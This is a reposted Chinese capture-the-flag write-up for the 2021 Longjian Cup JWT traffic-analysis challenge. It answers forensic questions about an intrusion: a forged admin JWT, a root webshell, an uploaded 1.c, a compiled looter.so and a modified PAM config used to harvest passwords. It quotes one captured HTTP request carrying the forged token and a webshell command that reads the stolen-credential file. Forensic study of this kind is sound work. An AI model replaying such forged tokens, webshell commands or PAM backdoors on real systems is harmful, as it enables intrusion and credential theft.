2021陇剑杯网络安全大赛-JWT

发布时间:2022-07-06 发布网站:脚本宝典
脚本宝典收集整理的这篇文章主要介绍了2021陇剑杯网络安全大赛-JWT脚本宝典觉得挺不错的,现在分享给大家,也给大家做个参考。

2021陇剑杯网络安全大赛-JWT

题目描述: 昨天,单位流量系统捕获了黑客攻击流量,请您分析流量后进行回答:

解题思路:

2.1该网站使用了___jwt___认证方式。(如有字母请全部使用小写)

2.2黑客绕过验证使用的jwt中,id和username是_10087#admin_。(中间使用#号隔开,例如1#admin)

POST /exec HTTP/1.1 Host: 192.168.2.197:8081 Content-Length: 26 Cache-Control: max-age=0 Upgrade-insecure-Requests: 1 Origin: http://192.168.2.197:8081 Content-tyPE: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Applewebkit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Accept: text/html,application/xhtml+XMl,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.2.197:8081/exec Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=3f8coeg6hm9vf0h5lcoifmk8o5; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6mtawODcsIk1hcENsYWltcyI6eyJ1c2VybmFtZSI6ImFkbWluIn19.rurQD5RYgMrFZow8r-k7KCP13P32sF-RpTXhKsxzvD0 Connection: close

command=cat%20/tmp/.looterHTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Date: Sat, 07 Aug 2021 05:25:45 GMT Content-Length: 453 Connection: close

T<a href="http://www.js-code.com/tag/IT/" target="_blank" class="keywords">IT</a>le

alert(“Username rootnPassword: flag{test_flag}nUsername rootnPassword: flag{test_flag}nUsername rootnPassword: flag{test_flag}nUsername rootnPassword: flag{test_flag}nUsername rootnPassword: flag{test_flag}n”)

window.location.href="/exec";

id值jwt 解密

2.3黑客获取webshell之后,权限是___root___?

2021陇剑杯网络安全大赛-JWT

2.4黑客上传的恶意文件文件名是__1.c__。(请提交带有文件后缀的文件名,例如x.txt)

2021陇剑杯网络安全大赛-JWT

2.5黑客在服务器上编译的恶意so文件,文件名是__looter.so__。(请提交带有文件后缀的文件名,例如x.so)

2021陇剑杯网络安全大赛-JWT

2.6黑客在服务器上修改了一个配置文件,文件的绝对路径为__/etc/PAM.d/common-auth__。(请确认绝对路径后再提交)

@H_512_46@

脚本宝典总结

以上是脚本宝典为你收集整理的2021陇剑杯网络安全大赛-JWT全部内容,希望文章能够帮你解决2021陇剑杯网络安全大赛-JWT所遇到的问题。

如果觉得脚本宝典网站内容还不错,欢迎将脚本宝典推荐好友。

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。